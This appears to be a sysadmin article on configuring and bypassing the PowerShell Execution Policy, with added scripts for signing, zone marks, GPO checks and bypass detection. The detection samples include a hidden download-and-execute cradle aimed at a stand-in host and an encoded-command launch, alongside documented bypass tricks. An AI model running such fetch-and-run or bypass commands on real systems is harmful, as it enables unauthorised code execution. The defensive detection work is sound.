By default, Windows client editions prevent PowerShell script files from running. From a security perspective it is useful to keep untrusted and malicious code from being launched as a PowerShell script, and the Execution Policy is the setting that controls which script files PowerShell will load. Keep in mind that Microsoft describes the Execution Policy as a safety feature rather than a security boundary: it stops users from running scripts by accident, but it does not stop a user (or an attacker) who can already type commands into the console. In this article we'll look at the available settings for running PS scripts on Windows, how to change the Execution Policy, and how to configure PowerShell script execution policies for domain computers using GPO.
Running PowerShell Scripts Is Disabled on This System
When trying to run any PowerShell script (a PS1 file) on a clean Windows 10 installation, the following error occurs:
File C:\ps\script.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at https://go.microsoft.com/fwlink/?LinkID=135170.
+ CategoryInfo : SecurityError: (:) [], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess
You can get the current settings for PowerShell script Execution Policy in Windows using the following command:
Get-ExecutionPolicy
The following PowerShell Execution Policy values are available:
- Restricted – no script files can be run; you can execute only interactive commands in the PS console;
- AllSigned – only scripts carrying a digital signature from a trusted publisher are allowed (you can sign a script with a self-signed certificate, provided its public part is added to the Trusted Root Certification Authorities and Trusted Publishers certificate stores). When running a script whose signer is not trusted, the following prompt appears:
Do you want to run software from this untrusted publisher? File .ps1 is published by CN=test1 and is not trusted on your system. Only run scripts from trusted publishers.
- RemoteSigned – local PowerShell scripts run without restrictions. Scripts that Windows has marked as downloaded from the Internet (files carrying a Zone.Identifier stream) must be signed by a trusted publisher; unsigned scripts opened from a shared network folder via a UNC path can also be blocked if the share is not mapped to the Local Intranet zone;
- Unrestricted – all PowerShell scripts are allowed to run, but when starting a script downloaded from the Internet you are prompted to confirm the launch (see below);
- Bypass – any PS file is allowed to run and no warnings are displayed. This policy is normally used to run PS scripts automatically without any notifications (for example, when scripts are started via GPO, SCCM, Task Scheduler, etc.) and is not recommended as a permanent setting;
- Default – sets the Execution Policy back to the default value for the OS edition. On Windows 10 (and other client editions) the Windows PowerShell default is Restricted, on Windows Server 2016 (and other server editions) it is RemoteSigned;
- Undefined – no policy is set in the given scope. If all scopes are Undefined, the effective policy is Restricted on desktop OSs and RemoteSigned on server ones.
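The AllSigned item above says a self-signed certificate is enough as long as it is trusted; the following script, added here as an example and not part of the original article, walks through that end to end: creating a code-signing certificate, trusting it, signing a script and verifying the signature. The path C:\ps\script.ps1, the certificate subject name and the timestamp server URL are assumptions; run it from an elevated console, because the certificate is imported into LocalMachine stores.

```powershell
# Added example: sign a script with a self-signed code-signing certificate so that
# it runs under the AllSigned policy. Assumed values: the script path, the
# certificate subject and the timestamp server (any RFC 3161 server works).
$scriptPath = 'C:\ps\script.ps1'

# 1. Create a self-signed code-signing certificate in the current user's store.
$cert = New-SelfSignedCertificate -Subject 'CN=PS Script Signing (test)' `
    -Type CodeSigningCert -CertStoreLocation Cert:\CurrentUser\My

# 2. Trust it on this machine. The public certificate must be in BOTH the Trusted
#    Root and the Trusted Publishers stores; with only the root in place AllSigned
#    still shows the "untrusted publisher" prompt.
$cerFile = Join-Path $env:TEMP 'ps-signing.cer'
Export-Certificate -Cert $cert -FilePath $cerFile | Out-Null
Import-Certificate -FilePath $cerFile -CertStoreLocation Cert:\LocalMachine\Root | Out-Null
Import-Certificate -FilePath $cerFile -CertStoreLocation Cert:\LocalMachine\TrustedPublisher | Out-Null

# 3. Sign the script. The signature is appended to the file as a comment block;
#    a timestamp keeps it valid after the certificate itself expires.
$sig = Set-AuthenticodeSignature -FilePath $scriptPath -Certificate $cert `
    -TimestampServer 'http://timestamp.digicert.com'   # assumed timestamp server

# 4. Verify. Status is Valid only while the signed content matches the signature;
#    editing the script after signing turns it into HashMismatch, and AllSigned
#    then refuses to load it.
function Test-ScriptSignature {
    param([string]$Path)
    $s = Get-AuthenticodeSignature -FilePath $Path
    [pscustomobject]@{
        Path   = $Path
        Status = $s.Status
        Signer = if ($s.SignerCertificate) { $s.SignerCertificate.Subject } else { $null }
    }
}

Test-ScriptSignature -Path $scriptPath
```

Keep the private key of a real signing certificate off the machines that only run scripts: they need the public certificate in the two stores, nothing more. Check Test-ScriptSignature again after every edit to a signed script, since the signature covers the whole file.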
How to Allow PowerShell to Run Scripts Using the Execution Policy?
To change the current value of the PowerShell script Execution Policy, the Set-ExecutionPolicy cmdlet is used. Without a scope it writes the LocalMachine setting, so the console must be run as an administrator.
For example, let's allow local PS script files to run:
Set-ExecutionPolicy RemoteSigned
Confirm changing the Execution Policy for PS1 scripts by pressing Y or A.
To avoid showing the confirmation prompt, use the Force parameter:
Set-ExecutionPolicy RemoteSigned -Force
If you have set the PowerShell Execution Policy to Unrestricted, you will still see a prompt when trying to run scripts downloaded from the Internet (and, depending on zone mapping, scripts started from shared folders by UNC path):
Security warning
Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning message. Do you want to run?
[D] Do not run [R] Run once [S] Suspend [?] Help (default is "D")
PowerShell recognizes such files by the ZoneId value in the Zone.Identifier alternate data stream (an NTFS ADS) that a browser or mail client writes when it saves a downloaded file (see the article How does Windows know if a file was downloaded from the Internet?). You can remove the mark by checking Unblock in the file properties or by clearing the zone label with the Unblock-File cmdlet.
You must also distinguish between the different scopes of the PowerShell Execution Policy:
- MachinePolicy – set by Group Policy (Computer Configuration) and applies to all users of the computer;
- UserPolicy – set by Group Policy (User Configuration) and applies to the users the GPO is linked to;
- Process – applies to the current PowerShell session only (it is kept in the $env:PSExecutionPolicyPreference environment variable and disappears when the powershell.exe process exits);
- CurrentUser – applies to the current user only (stored as a value under the HKEY_CURRENT_USER registry key);
- LocalMachine – applies to all users of the computer (stored as a value under the HKEY_LOCAL_MACHINE registry key).
The scopes are listed in order of precedence: the first scope from the top of this list whose value is not Undefined becomes the effective policy, which is why a GPO setting overrides anything configured locally.
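To see the Zone.Identifier mark described above in action, here is an added example (not code from the original article) that creates a test script, marks it the way a browser download would be marked, inspects the stream and then unblocks it. The folder C:\ps and the file name are assumptions; the folder must be on an NTFS volume, since alternate data streams do not exist on FAT/exFAT.

```powershell
# Added example: inspect and remove the "downloaded from the Internet" mark that
# RemoteSigned and Unrestricted react to. Assumed path: C:\ps on an NTFS volume.
$script = 'C:\ps\zone_demo.ps1'
'Write-Host "hello from zone demo"' | Set-Content -Path $script

# Constructed test data: write the same alternate data stream a browser writes.
# ZoneId 3 = Internet zone (0 = Local machine, 1 = Intranet, 2 = Trusted sites,
# 4 = Restricted sites).
$ads = "[ZoneTransfer]`r`nZoneId=3"
Set-Content -Path $script -Stream Zone.Identifier -Value $ads

function Get-FileZone {
    param([string]$Path)
    # Get-Item -Stream * lists all streams; an unmarked file has only ':$DATA'.
    $streams = (Get-Item -Path $Path -Stream *).Stream
    if ($streams -notcontains 'Zone.Identifier') {
        return 'Local (no Zone.Identifier stream)'
    }
    $content = Get-Content -Path $Path -Stream Zone.Identifier
    foreach ($line in $content) {
        if ($line -match '^ZoneId=(\d)') { return "ZoneId=$($Matches[1])" }
    }
    return 'Zone.Identifier present but no ZoneId line'
}

# While the mark is present, RemoteSigned refuses the unsigned file with
# "is not digitally signed" and Unrestricted shows the "Do you want to run?" prompt.
Get-FileZone -Path $script

# Unblock-File deletes the Zone.Identifier stream, so the file is local again.
Unblock-File -Path $script
Get-FileZone -Path $script

# Files on a share or an extracted ZIP can carry the mark too; this finds them in bulk.
Get-ChildItem -Path 'C:\ps' -Filter *.ps1 -Recurse |
    Where-Object { (Get-Item $_.FullName -Stream *).Stream -contains 'Zone.Identifier' } |
    Select-Object FullName
```

The same stream is what the Unblock checkbox in file properties removes. Note that copying a marked file with Windows tools keeps the stream, while tools that do not handle alternate streams (or a copy to a non-NTFS volume) silently drop it, so the mark is a convenience signal rather than a reliable record of a file's origin.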
You can set the policy scope using the Scope parameter of the Set-ExecutionPolicy cmdlet. For example:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force
Let’s check the current ExecutionPolicy settings for all scopes:
Get-ExecutionPolicy -List
Scope           ExecutionPolicy
-----           ---------------
MachinePolicy   Undefined
UserPolicy      Undefined
Process         Bypass
CurrentUser     Undefined
LocalMachine    RemoteSigned
The Execution Policy values you set using the Set-ExecutionPolicy cmdlet for CurrentUser and LocalMachine scopes are stored in the registry. For example, run this command:
Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy Restricted -Force
Open the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell registry key and check the REG_SZ value of the ExecutionPolicy parameter. It should change to Restricted (the allowed parameter values are Restricted, AllSigned, RemoteSigned, Bypass, Unrestricted and Undefined).
The same settings for the CurrentUser scope are located under HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell. Note that PowerShell 7 (pwsh.exe) keeps its own LocalMachine and CurrentUser settings under a separate PowerShellCore key, so changing the Windows PowerShell policy does not change the policy of pwsh.exe, and vice versa.
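The scope precedence and the registry locations above can be tied together in one script. This is an added example, not code from the original article: it walks the scopes in order of precedence to compute the effective policy, compares the result with what Get-ExecutionPolicy reports, and shows where each scope's value actually lives. It assumes Windows PowerShell 5.1 (the registry paths are the ones documented above, not the PowerShell 7 key).

```powershell
# Added example: compute the effective Execution Policy from the per-scope list
# and show where the values are stored. Assumes Windows PowerShell 5.1.

# Most specific first; the first scope that is not Undefined wins.
$scopeOrder = 'MachinePolicy', 'UserPolicy', 'Process', 'CurrentUser', 'LocalMachine'

function Get-EffectiveExecutionPolicy {
    $list = Get-ExecutionPolicy -List
    foreach ($scope in $scopeOrder) {
        $entry = $list | Where-Object Scope -eq $scope
        if ($entry.ExecutionPolicy -ne 'Undefined') {
            return [pscustomobject]@{ Scope = $scope; Policy = $entry.ExecutionPolicy }
        }
    }
    # Everything Undefined: fall back to the OS default.
    # Win32_OperatingSystem.ProductType 1 = workstation, 2 = domain controller, 3 = server.
    $isServer = (Get-CimInstance Win32_OperatingSystem).ProductType -ne 1
    [pscustomobject]@{
        Scope  = 'Default'
        Policy = if ($isServer) { 'RemoteSigned' } else { 'Restricted' }
    }
}

# Where the two persistent non-GPO scopes are stored.
$lmKey = 'HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'
$cuKey = 'HKCU:\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'
Get-ItemProperty -Path $lmKey -Name ExecutionPolicy -ErrorAction SilentlyContinue |
    Select-Object @{n = 'Scope'; e = { 'LocalMachine' }}, ExecutionPolicy
Get-ItemProperty -Path $cuKey -Name ExecutionPolicy -ErrorAction SilentlyContinue |
    Select-Object @{n = 'Scope'; e = { 'CurrentUser' }}, ExecutionPolicy

# The Process scope is not in the registry at all: it is an environment variable
# of this process, which is why it vanishes when powershell.exe exits.
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force
"Process scope variable: $env:PSExecutionPolicyPreference"

# Consistency check: the precedence walk must agree with the cmdlet's own answer.
$computed = Get-EffectiveExecutionPolicy
$actual   = Get-ExecutionPolicy
"Computed: $($computed.Policy) (from scope $($computed.Scope)); reported: $actual; match: $($computed.Policy -eq $actual)"
```

After the Set-ExecutionPolicy call the computed policy comes from the Process scope unless a GPO is in effect, in which case MachinePolicy or UserPolicy wins and the Process value is ignored; that is exactly the behaviour behind the "overridden by a policy defined at a more specific scope" message shown later in this article.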
Note that AllSigned at the LocalMachine level is the setting most often used in corporate environments: it gives the best balance between security and convenience, as long as there is a working process for signing scripts. For personal use, RemoteSigned is usually sufficient. The Bypass policy should be limited to specific tasks (for example, scripts started by GPO or by Task Scheduler jobs), and even then prefer setting it in the Process scope of that task rather than persistently.
Set PowerShell Execution Policy in Active Directory Using GPO
You can configure the Execution Policy for PowerShell scripts on servers or domain computers in Active Directory domain using Group Policies.
- In the Group Policy Management console (gpmc.msc), create a new GPO or edit an existing one and link it to the OU containing the computers you want the PowerShell script Execution Policy applied to;
- In the GPO editor, open Computer Configuration -> Policies -> Administrative Templates -> Windows Components -> Windows PowerShell and find the Turn on Script Execution setting. The same setting exists under User Configuration, but the computer policy (MachinePolicy scope) takes precedence over the user policy (UserPolicy scope);
- When enabled, the policy offers three values:
- Allow only signed scripts – corresponds to the AllSigned policy
- Allow local scripts and remote signed scripts – corresponds to the RemoteSigned policy
- Allow all scripts – corresponds to the Unrestricted policy
(If the setting is Disabled, no scripts are allowed to run, which is equivalent to Restricted.)
- Set the policy value you want, save the GPO and update the Group Policy settings on the computer (gpupdate /force);
- Make sure that the new execution settings have been applied to the MachinePolicy scope (Get-ExecutionPolicy -List).
After the Execution Policy has been configured using GPO, it can no longer be changed manually: Set-ExecutionPolicy still writes the requested value to the registry, but the GPO scope takes precedence. If you try to change the Execution Policy on a computer the GPO is applied to, the following message appears:
Set-ExecutionPolicy: Windows PowerShell updated your execution policy successfully, but the setting is overridden by a policy defined at a more specific scope. Due to the override, your shell will retain its current effective execution policy of RemoteSigned. Type "Get-ExecutionPolicy -List" to view your execution policy settings.
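The GPO setting is itself just a registry value under the Policies hive, so its effect can be verified without the GUI, locally or across a set of computers. The following is an added example and not code from the original article; the computer names are placeholders, and the fleet check assumes WinRM (PowerShell Remoting) is enabled on the targets.

```powershell
# Added example: verify which Execution Policy Group Policy enforces and compare
# it with what PowerShell reports for the MachinePolicy and UserPolicy scopes.
# Assumptions: Windows PowerShell 5.1; the computer names below are placeholders.

function Get-PolicyExecutionSettings {
    # "Turn on Script Execution" writes EnableScripts (DWORD, 1 = enabled) and
    # ExecutionPolicy (REG_SZ) under the Policies hive. The HKLM key feeds the
    # MachinePolicy scope, the HKCU key feeds the UserPolicy scope.
    $keys = @{
        MachinePolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
        UserPolicy    = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    }
    foreach ($scope in $keys.Keys) {
        $p = Get-ItemProperty -Path $keys[$scope] -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Computer      = $env:COMPUTERNAME
            Scope         = $scope
            EnableScripts = if ($p) { $p.EnableScripts } else { $null }
            RegistryValue = if ($p -and $p.ExecutionPolicy) { $p.ExecutionPolicy } else { 'Undefined' }
            Reported      = Get-ExecutionPolicy -Scope $scope
        }
    }
}

# Local check, e.g. right after gpupdate /force.
Get-PolicyExecutionSettings | Format-Table -AutoSize

# Fleet check over PowerShell Remoting. Placeholder names: replace with your own.
$computers = 'PC01', 'PC02', 'SRV01'
Invoke-Command -ComputerName $computers -ScriptBlock ${function:Get-PolicyExecutionSettings} |
    Select-Object Computer, Scope, RegistryValue, Reported |
    Sort-Object Computer, Scope |
    Format-Table -AutoSize
```

Two caveats when reading the output: a row whose RegistryValue differs from Reported usually means the policy changed but the session was started before gpupdate ran, and over remoting the HKCU hive is that of the account you connected with, so UserPolicy for an interactively logged-on user has to be checked in that user's own session.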
How to Bypass the PowerShell Execution Policy on Windows?
There are a few tricks that let you run a PowerShell script without changing the persistent Execution Policy settings. For example, I want to run a simple PS1 script that checks whether it is running as an administrator.
You can get the script contents using Get-Content and redirect it to the standard input stream of the PS console.
Get-Content c:\ps\check_process_elevation.ps1 | PowerShell.exe -noprofile -
Or you can run a new powershell.exe process with the Bypass policy:
powershell.exe -noprofile -executionpolicy bypass -file c:\ps\check_process_elevation.ps1
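Note the difference between the two tricks: the -ExecutionPolicy parameter only sets the Process scope, so it is overridden when a GPO sets MachinePolicy or UserPolicy, whereas piping the script text to standard input works regardless of any policy because no script file is ever loaded. That is the practical reason the Execution Policy cannot serve as a security control, and why defenders monitor for these patterns instead. The following function is an added example (not code from the original article) that scans process command lines, as recorded in Security event 4688 with command-line auditing or Sysmon event 1, for the bypass patterns shown above; the sample lines are constructed for the example and are not real telemetry.

```powershell
# Added example: flag process command lines that sidestep the Execution Policy.
# Input is a list of command-line strings (e.g. the CommandLine field of 4688 or
# Sysmon event 1); the samples at the bottom are constructed, not real logs.

function Find-ExecutionPolicyBypass {
    param([string[]]$CommandLine)
    $patterns = @{
        # -ExecutionPolicy Bypass / Unrestricted, including the short forms PowerShell accepts
        'ExecutionPolicy Bypass/Unrestricted' = '(?i)-(ex|exec|executionpolicy|ep)\s+(bypass|unrestricted)'
        # script text fed to powershell via stdin ("... | powershell -"): no file is ever loaded
        'Script piped to stdin'               = '(?i)(get-content|gc|cat|type)\s+.*\.ps1.*\|\s*powershell(\.exe)?\s+.*-\s*$'
        # base64 UTF-16 payload passed with -EncodedCommand: also never touches a .ps1 file
        'Encoded command'                     = '(?i)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}'
    }
    foreach ($line in $CommandLine) {
        foreach ($name in $patterns.Keys) {
            if ($line -match $patterns[$name]) {
                [pscustomobject]@{ Technique = $name; CommandLine = $line }
            }
        }
    }
}

# Constructed sample command lines (not real telemetry). The first two and the
# fourth should be flagged, the last one is a benign script launch.
$samples = @(
    'powershell.exe -noprofile -executionpolicy bypass -file c:\ps\check_process_elevation.ps1',
    'powershell.exe -ep Bypass -w hidden -c "iex (New-Object Net.WebClient).DownloadString(''http://example.invalid/a.ps1'')"',
    'cmd.exe /c type c:\ps\check_process_elevation.ps1 | PowerShell.exe -noprofile -',
    'powershell.exe -NoP -NonI -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=',
    'powershell.exe -noprofile -file c:\ps\inventory.ps1'
)

Find-ExecutionPolicyBypass -CommandLine $samples | Format-Table -AutoSize
```

The third sample is flagged as well, since it is the stdin trick from this section. Command-line matching is a first filter, not a verdict: legitimate deployment tools (GPO scripts, SCCM, scheduled tasks) use -ExecutionPolicy Bypass routinely, so pair these hits with the parent process and the user, and enable PowerShell script block logging (event 4104) to see what actually ran.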
1 comment
Amazing article! Thank you a lot.
Please keep up the good work.